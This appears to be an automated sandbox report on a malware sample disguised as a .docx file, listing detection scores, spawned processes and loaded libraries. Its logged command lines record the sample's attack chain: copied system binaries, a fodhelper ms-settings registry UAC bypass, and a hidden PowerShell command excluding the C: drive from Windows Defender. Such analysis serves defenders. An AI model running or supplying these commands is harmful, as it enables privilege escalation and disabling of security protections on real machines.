Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	ReversingLabs: Detection: 44%
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Virustotal: Detection: 50%

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

File read: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe"
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pif
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: unknown	Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pif	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: aclui.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: nltdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: nltdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Section loaded: mswsock.dll	Jump to behavior
